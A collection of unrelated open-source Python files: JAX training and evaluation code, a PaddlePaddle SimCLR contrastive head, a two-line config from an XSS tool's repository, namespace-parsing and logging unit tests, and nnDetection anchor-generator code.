jnp.nan_to_num(nsp_loss, copy=False)
nsp_loss = jnp.mean(nsp_loss, 0) * self.config.loss.nsp.weight
nsp_all_accuracy = (jnp.argmax(
nsp_logits, -1) == next_sentence_label).astype(nsp_logits.dtype)
nsp_accuracy = jnp.divide(
jnp.sum(
jnp.multiply(nsp_all_accuracy,
next_sentence_mask.astype(nsp_logits.dtype))),
jnp.sum(next_sentence_mask) + eps)
nsp_loss *= linear_weight(global_step, self.config.loss.nsp.step_start,
self.config.loss.nsp.step_end)
loss = date_loss + subregion_loss + mask_loss + nsp_loss
scaled_loss = loss / jax.device_count()
# NOTE: We use scaled_loss for grads and unscaled for logging.
return scaled_loss, (loss, date_loss, subregion_loss, subregion_accuracy,
mask_loss, mask_accuracy, nsp_loss, nsp_accuracy)
def _update_func(self, params, opt_state, global_step, batch, rng):
"""Applies an update to parameters and returns new state."""
# This function computes the gradient of the first output of loss_fn and
# passes through the other arguments unchanged.
grad_loss_fn = jax.grad(self._loss_fn, has_aux=True)
scaled_grads, (loss, date_loss, subregion_loss, subregion_accuracy,
mask_loss, mask_accuracy, nsp_loss,
nsp_accuracy) = grad_loss_fn(params, batch, global_step, rng)
scaled_grads = jax.tree_map(jnp.nan_to_num, scaled_grads)
grads = jl_utils.tree_psum(scaled_grads, axis_name='i')
# Compute and apply updates via our optimizer.
learning_rate = self._learning_rate_fn(global_step)
updates, opt_state = self._opt_update(grads, opt_state, params=params)
params = optax.apply_updates(params, updates)
# Scalars to log (note: we log the mean across all hosts/devices).
scalars = {
'loss/train': loss,
'loss/date': date_loss,
'loss/subregion': subregion_loss,
'loss/mask': mask_loss,
'loss/nsp': nsp_loss,
'accuracy/subregion': subregion_accuracy,
'accuracy/mask': mask_accuracy,
'accuracy/nsp': nsp_accuracy,
'opt/learning_rate': learning_rate,
'opt/grad_norm': optax.global_norm(grads),
'opt/param_norm': optax.global_norm(params),
}
scalars = jax.lax.pmean(scalars, axis_name='i')
return params, opt_state, scalars
# _
# _____ ____ _| |
# / _ \ \ / / _` | |
# | __/\ V / (_| | |
# \___| \_/ \__,_|_|
#
def evaluate(self, global_step, rng, **unused_kwargs):
"""See base class."""
if self._eval_input is None:
self._initialize_eval()
global_step = np.array(jl_utils.get_first(global_step))
summary, outputs = self._eval_epoch(jl_utils.get_first(rng))
for k, v in summary.items():
summary[k] = np.array(v)
score = summary['score/eval']
logging.info('[Step %d] eval_score=%.2f', global_step, score)
# Log outputs
checkpoint_dir = jl_utils.get_checkpoint_dir(FLAGS.config,
jax.process_index())
outputs_path = os.path.join(checkpoint_dir, 'best_outputs.pkl.bz2')
score_path = os.path.join(checkpoint_dir, 'best_score.txt')
model_log_path = os.path.join(checkpoint_dir, 'model_log')
best_model_log_path = os.path.join(checkpoint_dir, 'best_model_log')
# Check for preexisting outputs
best_score = None
best_step = None
if os.path.exists(score_path):
with open(score_path, 'r') as f:
tok = f.read().strip().split(' ')
best_step = int(tok[0])
best_score = float(tok[1])
# Store outputs if score is better
if best_score is None or (score > best_score and global_step > best_step):
best_score = score
with open(score_path, 'w') as f:
f.write(f'{global_step} {best_score}')
with open(outputs_path, 'wb') as f:
outputs_pkl = pickle.dumps(outputs, protocol=2)
outputs_pkl_bz2 = bz2.compress(outputs_pkl)
f.write(outputs_pkl_bz2)
if self.config.evaluation.store_model_log:
if os.path.isdir(best_model_log_path):
map(os.remove, glob.glob(best_model_log_path + '/*'))
else:
os.makedirs(best_model_log_path)
distutils.dir_util.copy_tree(model_log_path, best_model_log_path)
logging.info('[Step %d] Writing eval outputs: %s.', global_step,
outputs_path)
# Log best score
summary['score/eval_best'] = best_score
return summary
def _initialize_eval(self):
self._eval_input = jl_utils.py_prefetch(self._build_eval_input)
def _build_eval_input(self):
"""Builds the evaluation input pipeline."""
config_dataset = self.config.dataset
with open(config_dataset.dataset_path) as dataset_file:
ds = dataloader.loader_tf(
self.config.evaluation.batch_size,
config_dataset,
self._region_map,
alphabet=self._alphabet,
dataset_file=dataset_file,
mode=self.config.evaluation.mode)
return iter(tfds.as_numpy(ds))
def _eval_batch(self, params, batch, rng):
"""Evaluates a batch."""
phi_id = batch['id']
text_char = batch['text_char']
text_word = batch['text_word']
text_unmasked = batch['text_unmasked']
text_mask = batch['text_mask']
next_sentence_mask = batch['next_sentence_mask']
next_sentence_label = batch['next_sentence_label']
subregion = batch['region_sub_id']
date_min = batch['date_min']
date_max = batch['date_max']
date_dist = batch['date_dist']
date_available = batch['date_available']
# with hlogging.context() as log:
(date_pred, subregion_logits, mask_logits, nsp_logits) = self.forward.apply(
params,
text_char=text_char,
text_word=text_word,
text_char_onehot=None,
text_word_onehot=None,
is_training=False,
rngs={'dropout': rng})
# Log model weights
model_log = {}
subregion_loss = 0.
subregion_accuracy = 0.
date_loss = 0.
date_l1_loss = 0.
nsp_loss = 0.
nsp_accuracy = 0.
# eps = 1e-6
date_count = 0
mask_count = 0
nsp_count = 0
# Date loss
if self.config.loss.date.enabled:
date_pred_x = jnp.arange(
self.config.dataset.date_min + self.config.dataset.date_interval / 2,
self.config.dataset.date_max + self.config.dataset.date_interval / 2,
self.config.dataset.date_interval).reshape(-1, 1)
date_pred_val = jnp.dot(jax.nn.softmax(date_pred, axis=-1), date_pred_x)
date_l1_loss = jnp.sum(
jax.vmap(date_loss_l1)(date_pred_val, date_min, date_max,
date_available),
axis=0)
if 'l1' in self.config.loss.date.type.split('+'):
date_loss += date_l1_loss * self.config.loss.date.weight_l1
if 'dist' in self.config.loss.date.type.split('+'):
date_loss_dist_ = categorical_kl_divergence(date_dist, date_pred)
date_loss_dist_ *= date_available
date_loss += (
jnp.sum(date_loss_dist_, axis=0) *
self.config.loss.date.weight_dist)
date_count = jnp.sum(date_available)
# Region and subregion loss
if self.config.loss.region.enabled:
subregion_loss = jnp.sum(
cross_entropy_loss(subregion_logits, subregion), 0)
subregion_loss *= self.config.loss.region.weight
subregion_accuracy = jnp.mean(
jnp.argmax(subregion_logits, -1) == subregion)
# Mask loss
if self.config.loss.mask.enabled:
mask_loss = jnp.sum(
cross_entropy_label_smoothing_loss(
mask_logits, text_unmasked, text_mask, label_smoothing=0),
1) # [B]
# mask_loss /= jnp.sum(text_mask, axis=1) + eps # [B]
assert mask_loss.ndim == 1
mask_loss = jnp.mean(mask_loss, 0) * self.config.loss.mask.weight # []
mask_all_accuracy = (jnp.argmax(mask_logits, -1) == text_unmasked).astype(
mask_logits.dtype)
mask_accuracy = jnp.sum(
jnp.multiply(mask_all_accuracy, text_mask.astype(mask_logits.dtype)))
mask_count = jnp.sum(text_mask)
# NSP loss
if self.config.loss.nsp.enabled:
nsp_loss = jnp.sum(
jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits,
next_sentence_label,
next_sentence_mask),
1) # [B]
assert nsp_loss.ndim == 1
nsp_loss = jnp.sum(nsp_loss, 0) * self.config.loss.nsp.weight
nsp_all_accuracy = (jnp.argmax(
nsp_logits, -1) == next_sentence_label).astype(nsp_logits.dtype)
nsp_accuracy = jnp.sum(
jnp.multiply(nsp_all_accuracy,
next_sentence_mask.astype(nsp_logits.dtype)))
nsp_count = jnp.sum(next_sentence_mask)
# Outputs
scalars = {
'score/eval':
(mask_accuracy + subregion_accuracy - date_l1_loss * 0.01),
'loss/eval': mask_loss + date_loss + subregion_loss,
'loss/date': date_loss,
'loss/date_l1': date_l1_loss,
'loss/subregion': subregion_loss,
'loss/mask': mask_loss,
'loss/nsp': nsp_loss,
'count/date': date_count,
'count/nsp': nsp_count,
'count/mask': mask_count,
'accuracy/subregion': subregion_accuracy,
'accuracy/mask': mask_accuracy,
'accuracy/nsp': nsp_accuracy,
}
outputs = {
'outputs/id': phi_id,
'outputs/date_pred': date_pred.astype('float16'),
'outputs/date_min': date_min,
'outputs/date_max': date_max,
'outputs/date_dist': date_dist.astype('float16'),
'outputs/date_available': date_available,
'outputs/subregion_logits': subregion_logits.astype('float16'),
'outputs/subregion': subregion,
}
return scalars, outputs, model_log
def _eval_epoch(self, rng):
"""Evaluates an epoch."""
summary = {}
outputs = {}
total_num_sequences = 0
# Prepare directories for storing model log
checkpoint_dir = jl_utils.get_checkpoint_dir(FLAGS.config,
jax.process_index())
model_log_path = os.path.join(checkpoint_dir, 'model_log')
if self.config.evaluation.store_model_log:
if os.path.isdir(model_log_path):
map(os.remove, glob.glob(model_log_path + '/*'))
else:
os.makedirs(model_log_path)
# Checkpoints broadcast for each local device
params = jl_utils.get_first(self._params)
# Model log buffer initialisation
model_log_buffer = []
def _flush_model_log_buffer(model_log_buffer):
"""Writes model log to bz2 pickle files."""
while model_log_buffer:
model_log_batch_path, model_log_pkl_bz2 = model_log_buffer.pop(0)
with open(model_log_batch_path, 'wb') as f:
f.write(model_log_pkl_bz2)
# Converting to numpy here allows us to reset the generator
for batch in self._eval_input():
# Make sure that the input has batch_dim=1
assert batch['text_char'].shape[0] == 1
summary_batch, outputs_batch, model_log_batch = self._eval_batch(
params, batch, rng)
# Append batch values to dictionary
for k, v in summary_batch.items():
summary[k] = summary.get(k, 0) + v
for k, v in outputs_batch.items():
outputs.setdefault(k, []).append(v)
total_num_sequences += self.config.evaluation.batch_size
# Store model log per batch
if self.config.evaluation.store_model_log:
# Append to buffer
model_log_batch_path = os.path.join(
model_log_path,
str(outputs_batch['outputs/id'][0]) + '.pkl.bz2')
model_log_pkl = pickle.dumps(model_log_batch, protocol=2)
model_log_pkl_bz2 = bz2.compress(model_log_pkl)
model_log_buffer += [(model_log_batch_path, model_log_pkl_bz2)]
# Flush model log buffer
if (len(model_log_buffer) %
self.config.evaluation.store_model_log_steps == 0):
_flush_model_log_buffer(model_log_buffer)
# Flush remaining model log buffer
if self.config.evaluation.store_model_log:
_flush_model_log_buffer(model_log_buffer)
# Normalise and concatenate
summary['loss/date'] /= summary['count/date']
summary['loss/date_l1'] /= summary['count/date']
summary['loss/mask'] /= summary['count/mask']
summary['accuracy/mask'] /= summary['count/mask']
summary['loss/nsp'] /= summary['count/nsp']
summary['accuracy/nsp'] /= summary['count/nsp']
summary['loss/subregion'] /= total_num_sequences
summary['accuracy/subregion'] /= total_num_sequences
summary['score/eval'] = (
summary['accuracy/mask'] + summary['accuracy/subregion'] -
summary['loss/date_l1'] * 0.01)
summary['loss/eval'] = (
summary['loss/mask'] + summary['loss/date'] + summary['loss/subregion'])
for k, v in outputs.items():
outputs[k] = np.concatenate(v, axis=0)
return summary, outputs
if __name__ == '__main__':
flags.mark_flag_as_required('config')
app.run(functools.partial(platform.main, Experiment))
|
passl/modeling/heads/simclr_contrastive_head.py | juneweng/PASSL | 136 | 12770292 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
from .builder import HEADS
import paddle.nn.functional as F
import paddle.fluid.layers as layers
LARGE_NUM = 1e9
@HEADS.register()
class SimCLRContrastiveHead(nn.Layer):
"""Head for contrastive learning.
Args:
temperature (float): The temperature hyper-parameter that
controls the concentration level of the distribution.
Default: 0.1.
"""
def __init__(self, temperature=0.5, return_accuracy=True, multi_rank=False):
super(SimCLRContrastiveHead, self).__init__()
self.criterion = nn.CrossEntropyLoss()
self.temperature = temperature
self.return_accuracy = return_accuracy
self.multi_rank = multi_rank
def forward(self, pos, neg):
"""Forward head.
Args:
pos (Tensor): Nx1 positive similarity.
neg (Tensor): Nxk negative similarity.
Returns:
dict[str, Tensor]: A dictionary of loss components.
"""
hidden1, hidden2 = pos, neg
batch_size = pos.shape[0]
# Gather hidden1/hidden2 across replicas and create local labels.
if self.multi_rank is True:
hidden1_large = self.add_allgather(hidden1, "hidden1"+str(self.co2))
hidden2_large = self.add_allgather(hidden2, "hidden2"+str(self.co2))
hidden1_large = paddle.reshape(hidden1_large,
[-1, hidden1_large.shape[-1]])
hidden2_large = paddle.reshape(hidden2_large,
[-1, hidden2_large.shape[-1]])
enlarged_batch_size = paddle.shape(hidden1_large)[0]
trainer_id = self.args.trainer_id
labels_idx = paddle.arange(0, batch_size, 1,
"int32") + trainer_id * batch_size
labels = F.one_hot(
paddle.reshape(labels_idx, [batch_size]),
enlarged_batch_size * 2)
masks = F.one_hot(
paddle.reshape(labels_idx, [batch_size]),
enlarged_batch_size)
else:
hidden1_large = hidden1
hidden2_large = hidden2
labels = F.one_hot(
paddle.reshape(
paddle.arange(0, batch_size, 1, "int32"), [batch_size]),
batch_size * 2)
masks = F.one_hot(
paddle.reshape(
paddle.arange(0, batch_size, 1, "int32"), [batch_size]),
batch_size)
logits_aa = paddle.matmul(
hidden1, hidden1_large, transpose_y=True) / self.temperature
logits_aa = logits_aa - masks * LARGE_NUM
logits_bb = paddle.matmul(
hidden2, hidden2_large, transpose_y=True) / self.temperature
logits_bb = logits_bb - masks * LARGE_NUM
logits_ab = paddle.matmul(
hidden1, hidden2_large, transpose_y=True) / self.temperature
logits_ba = paddle.matmul(
hidden2, hidden1_large, transpose_y=True) / self.temperature
loss_a = paddle.nn.functional.softmax_with_cross_entropy(
paddle.concat([logits_ab, logits_aa], 1), labels, soft_label=True)
loss_b = paddle.nn.functional.softmax_with_cross_entropy(
paddle.concat([logits_ba, logits_bb], 1), labels, soft_label=True)
contrast_loss = loss_a + loss_b
logits_ab_co2 = logits_ab - masks * LARGE_NUM
logits_ba_co2 = logits_ba - masks * LARGE_NUM
logit_a = paddle.concat([logits_aa, logits_ab_co2], 1)
logit_b = paddle.concat([logits_ba_co2, logits_bb], 1)
log_a = paddle.nn.functional.log_softmax(logit_a)
log_b = paddle.nn.functional.log_softmax(logit_b)
a = paddle.nn.functional.softmax(logit_a)
b = paddle.nn.functional.softmax(logit_b)
kl_1 = paddle.nn.functional.kl_div(log_a, b, reduction='batchmean')
kl_2 = paddle.nn.functional.kl_div(log_b, a, reduction='batchmean')
co2_loss = 1 * (kl_1 + kl_2)
total_contrast_loss = contrast_loss + 3 * co2_loss
loss = layers.reduce_mean(total_contrast_loss)
contrastive_label = paddle.unsqueeze(
paddle.argmax(
labels, axis=1), 1)
acc1 = layers.accuracy(input=logits_ab, label=contrastive_label)
outputs = dict()
outputs['loss'] = loss
outputs['acc1'] = acc1
return outputs
def accuracy(output, target, topk=(1, )):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with paddle.no_grad():
maxk = max(topk)
batch_size = target.shape[0]
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = paddle.cast(pred == target.reshape([1, -1]).expand_as(pred),
'float32')
res = []
for k in topk:
correct_k = correct[:k].reshape([-1]).sum(0, keepdim=True)
res.append(correct_k * 100.0 / batch_size)
return res
def add_allgather(self, hidden, name=""):
block = self._train_program.global_block()
hidden_large = block.create_var(
name=name,
shape=[self.args.trainer_num] + list(hidden.shape),
persistable=False,
dtype=core.VarDesc.VarType.FP32)
op_len = len(list(enumerate(block.ops)))
op_maker = core.op_proto_and_checker_maker
self.op_role_key = op_maker.kOpRoleAttrName()
block._insert_op(
op_len,
type='c_allgather',
inputs={'X': hidden},
outputs={'Out': hidden_large},
attrs={
'nranks': self.args.trainer_num,
self.op_role_key: OpRole.Forward,
"use_calc_stream": True
})
return hidden_large
|
xssor/tcp.py | boundmania/xssor2 | 2,126 | 12770323 | <filename>xssor/tcp.py
sys_name = "XSS'OR"
sys_copyright = <EMAIL>cos.me"
def sys(req):
return {
'sys_name': sys_name,
'sys_copyright': sys_copyright,
}
|
tests/_namespace_util_test.py | poros/data_pipeline | 110 | 12770348 | <filename>tests/_namespace_util_test.py
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
from data_pipeline._namespace_util import DBSourcedNamespace
class TestDBSourcedtNamespace(object):
def test_simple(self):
name = "refresh_primary.yelp"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="refresh_primary",
expected_database="yelp"
)
def test_main_cluster(self):
name = "main.database"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="main",
expected_database="database"
)
def test_environment(self):
name = "main.refresh_primary.yelp"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="refresh_primary",
expected_database="yelp",
expected_environment="main"
)
def test_tranformers(self):
name = "dev.refresh_primary.yelp.heartbeat.yelp-main_transformed"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="refresh_primary",
expected_database="yelp",
expected_environment="dev",
expected_suffixes=["heartbeat", "yelp-main_transformed"]
)
def test_fail_missing(self):
self._assert_failure("yelp", error_substr="not enough sections")
self._assert_failure("refresh_primary", error_substr="not enough sections")
def test_fail_invalid_chars(self):
self._assert_failure("^refresh_primary.yelp", error_substr="must contain at least")
self._assert_failure("fadjskl;.fjd", error_substr="must contain at least")
self._assert_failure("______.______", error_substr="must contain at least")
self._assert_failure("refresh_primary..yelp", error_substr="must contain at least")
def test_guarantees(self):
name = "main.database.transformer"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_cluster="main"
),
expected_name=name,
expected_cluster="main",
expected_database="database",
expected_suffixes=["transformer"]
)
def test_guarantees_db(self):
name = "main.database.transformer"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_database="database"
),
expected_name=name,
expected_cluster="main",
expected_database="database",
expected_suffixes=["transformer"]
)
def test_guarantees_transformer(self):
name = "main.database.transformer"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_suffixes=["transformer"]
),
expected_name=name,
expected_cluster="main",
expected_database="database",
expected_suffixes=["transformer"]
)
def test_guarantees_environment(self):
name = "env.cluster.database"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_environment="env"
),
expected_name=name,
expected_environment="env",
expected_cluster="cluster",
expected_database="database"
)
def test_fail_impossible(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_environment="main"
)
def test_fail_impossible_suffixes(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_suffixes=["heartbeat"]
)
def test_fail_impossible_double_cluster_env(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_environment="dev",
expected_cluster="dev"
)
def test_fail_impossible_env_db(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_environment="dev",
expected_database="refresh_primary"
)
def test_no_name(self):
self._assert_success(
actual_namespace=DBSourcedNamespace(
environment="main",
cluster="refresh_primary",
database="yelp"
),
expected_name="main.refresh_primary.yelp",
expected_environment="main",
expected_cluster="refresh_primary",
expected_database="yelp"
)
def test_no_name_no_env(self):
self._assert_success(
actual_namespace=DBSourcedNamespace(
cluster="refresh_primary",
database="yelp",
suffixes=["heartbeat"]
),
expected_name="refresh_primary.yelp.heartbeat",
expected_cluster="refresh_primary",
expected_database="yelp",
expected_suffixes=["heartbeat"]
)
def _assert_failure(self, name, error_substr):
with pytest.raises(ValueError) as e:
DBSourcedNamespace.create_from_namespace_name(name)
assert error_substr in e
def _assert_failure_with_guarantees(
self,
name,
expected_cluster=None,
expected_database=None,
expected_environment=None,
expected_suffixes=None
):
with pytest.raises(ValueError) as e:
DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_environment=expected_environment,
expected_cluster=expected_cluster,
expected_database=expected_database,
expected_suffixes=expected_suffixes
)
assert "impossible to rectify" in e
def _assert_success(
self,
actual_namespace,
expected_name,
expected_cluster,
expected_database,
expected_environment=None,
expected_suffixes=None
):
if not expected_suffixes:
expected_suffixes = []
assert actual_namespace.get_name() == expected_name
assert actual_namespace.cluster == expected_cluster
assert actual_namespace.database == expected_database
assert actual_namespace.environment == expected_environment
assert actual_namespace.suffixes == expected_suffixes
|
tests/unit2/test_arcade.py | LiorAvrahami/arcade | 824 | 12770349 | <filename>tests/unit2/test_arcade.py
import logging
import arcade
def test_logging():
arcade.configure_logging(logging.WARNING)
logger = logging.getLogger('arcade')
assert logger.level == logging.WARNING
|
nndet/core/boxes/anchors.py | joeranbosma/nnDetection | 242 | 12770377 | <reponame>joeranbosma/nnDetection
"""
Parts of this code are from torchvision and thus licensed under
BSD 3-Clause License
Copyright (c) <NAME> 2016,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import torch
from typing import Callable, Sequence, List, Tuple, TypeVar, Union
from torchvision.models.detection.rpn import AnchorGenerator
from loguru import logger
from itertools import product
AnchorGeneratorType = TypeVar('AnchorGeneratorType', bound=AnchorGenerator)
def get_anchor_generator(dim: int, s_param: bool = False) -> AnchorGenerator:
"""
Get anchor generator class for corresponding dimension
Args:
dim: number of spatial dimensions
s_param: enable size parametrization
Returns:
Callable: class of anchor generator
"""
normal = {2: AnchorGenerator2D, 3: AnchorGenerator3D}
sparam = {2: AnchorGenerator2DS, 3: AnchorGenerator3DS}
if s_param:
return sparam[dim]
else:
return normal[dim]
def compute_anchors_for_strides(anchors: torch.Tensor,
strides: Sequence[Union[Sequence[Union[int, float]], Union[int, float]]],
cat: bool) -> Union[List[torch.Tensor], torch.Tensor]:
"""
Compute anchors sizes which follow a given sequence of strides
Args:
anchors: anchors for stride 0
strides: sequence of strides to adjust anchors for
cat: concatenate resulting anchors, if false a Sequence of Anchors
is returned
Returns:
Union[List[torch.Tensor], torch.Tensor]: new anchors
"""
anchors_with_stride = [anchors]
dim = anchors.shape[1] // 2
for stride in strides:
if isinstance(stride, (int, float)):
stride = [stride] * dim
stride_formatted = [stride[0], stride[1], stride[0], stride[1]]
if dim == 3:
stride_formatted.extend([stride[2], stride[2]])
anchors_with_stride.append(
anchors * torch.tensor(stride_formatted)[None].float())
if cat:
anchors_with_stride = torch.cat(anchors_with_stride, dim=0)
return anchors_with_stride
class AnchorGenerator2D(torch.nn.Module):
def __init__(self, sizes: Sequence[Union[int, Sequence[int]]] = (128, 256, 512),
aspect_ratios: Sequence[Union[float, Sequence[float]]] = (0.5, 1.0, 2.0),
**kwargs):
"""
Generator for anchors
Modified from https://github.com/pytorch/vision/blob/master/torchvision/models/detection/rpn.py
Args:
sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map
(length should match the number of feature maps)
aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios:
height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have
the same length as sizes
"""
super().__init__()
if not isinstance(sizes[0], (list, tuple)):
sizes = tuple((s,) for s in sizes)
if not isinstance(aspect_ratios[0], (list, tuple)):
aspect_ratios = (aspect_ratios,) * len(sizes)
assert len(sizes) == len(aspect_ratios)
self.sizes = sizes
self.aspect_ratios = aspect_ratios
self.cell_anchors = None
self._cache = {}
self.num_anchors_per_level: List[int] = None
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def cached_grid_anchors(self, grid_sizes: List[List[int]], strides: List[List[int]]) -> List[torch.Tensor]:
"""
Check if combination was already generated before and return that if possible
Args:
grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps
strides (Sequence[Sequence[int]]): stride of each feature map
Returns:
List[torch.Tensor]: Anchors for each feature maps
"""
key = str(grid_sizes + strides)
if key not in self._cache:
self._cache[key] = self.grid_anchors(grid_sizes, strides)
self.num_anchors_per_level = self._cache[key][1]
return self._cache[key][0]
def grid_anchors(self, grid_sizes, strides) -> Tuple[List[torch.Tensor], List[int]]:
"""
Distribute anchors over feature maps
Args:
grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps
strides (Sequence[Sequence[int]]): stride of each feature map
Returns:
List[torch.Tensor]: Anchors for each feature maps
List[int]: number of anchors per level
"""
assert len(grid_sizes) == len(strides), "Every fm size needs strides"
assert len(grid_sizes) == len(self.cell_anchors), "Every fm size needs cell anchors"
anchors = []
cell_anchors = self.cell_anchors
assert cell_anchors is not None
_i = 0
# modified from torchvision (ordering of axis differs)
anchor_per_level = []
for size, stride, base_anchors in zip(grid_sizes, strides, cell_anchors):
size0, size1 = size
stride0, stride1 = stride
device = base_anchors.device
shifts_x = torch.arange(0, size0, dtype=torch.float, device=device) * stride0
shifts_y = torch.arange(0, size1, dtype=torch.float, device=device) * stride1
shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)
shift_x = shift_x.reshape(-1)
shift_y = shift_y.reshape(-1)
shifts = torch.stack((shift_x, shift_y, shift_x, shift_y), dim=1)
_anchors = (shifts.view(-1, 1, 4) + base_anchors.view(1, -1, 4)).reshape(-1, 4)
anchors.append(_anchors)
anchor_per_level.append(_anchors.shape[0])
logger.debug(f"Generated {anchors[_i].shape[0]} anchors and expected "
f"{size0 * size1 * self.num_anchors_per_location()[_i]} "
f"anchors on level {_i}.")
_i += 1
return anchors, anchor_per_level
@staticmethod
def generate_anchors(scales: Tuple[int],
aspect_ratios: Tuple[float],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu",
) -> torch.Tensor:
"""
Generate anchors for a pair of scales and ratios
Args:
scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128)
aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. (0.5, 1, 2)
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
Tensor: anchors of shape [n(scales) * n(ratios), dim * 2]
"""
scales = torch.as_tensor(scales, dtype=dtype, device=device)
aspect_ratios = torch.as_tensor(aspect_ratios, dtype=dtype, device=device)
h_ratios = torch.sqrt(aspect_ratios)
w_ratios = 1 / h_ratios
ws = (w_ratios[:, None] * scales[None, :]).view(-1)
hs = (h_ratios[:, None] * scales[None, :]).view(-1)
base_anchors = torch.stack([-ws, -hs, ws, hs], dim=1) / 2
return base_anchors.round()
def set_cell_anchors(self, dtype: torch.dtype, device: Union[torch.device, str] = "cpu") -> None:
"""
Set :para:`self.cell_anchors` if it was not already set
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None
result is saved into attribute
"""
if self.cell_anchors is not None:
return
cell_anchors = [self.generate_anchors(sizes, aspect_ratios, dtype, device)
for sizes, aspect_ratios in zip(self.sizes, self.aspect_ratios)]
self.cell_anchors = cell_anchors
def forward(self, image_list: torch.Tensor, feature_maps: List[torch.Tensor]) -> List[torch.Tensor]:
"""
Generate anchors for given feature maps
# TODO: update docstring and type
Args:
image_list (torch.Tensor): data structure which contains images and their original shapes
feature_maps (Sequence[torch.Tensor]): feature maps for which anchors need to be generated
Returns:
List[Tensor]: list of anchors (for each image inside the batch)
"""
device = image_list.device
grid_sizes = list([feature_map.shape[2:] for feature_map in feature_maps])
image_size = image_list.shape[2:]
strides = [list((int(i / s) for i, s in zip(image_size, fm_size))) for fm_size in grid_sizes]
self.set_cell_anchors(dtype=feature_maps[0].dtype, device=feature_maps[0].device)
anchors_over_all_feature_maps = self.cached_grid_anchors(grid_sizes, strides)
anchors = []
images_shapes = [img.shape for img in image_list.split(1)]
for i, x in enumerate(images_shapes):
anchors_in_image = []
for anchors_per_feature_map in anchors_over_all_feature_maps:
anchors_in_image.append(anchors_per_feature_map)
anchors.append(anchors_in_image)
anchors = [torch.cat(anchors_per_image).to(device) for anchors_per_image in anchors]
# TODO: check with torchvision if this makes sense (if enabled, anchors are newly generated for each run)
# # Clear the cache in case that memory leaks.
# self._cache.clear()
return anchors
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
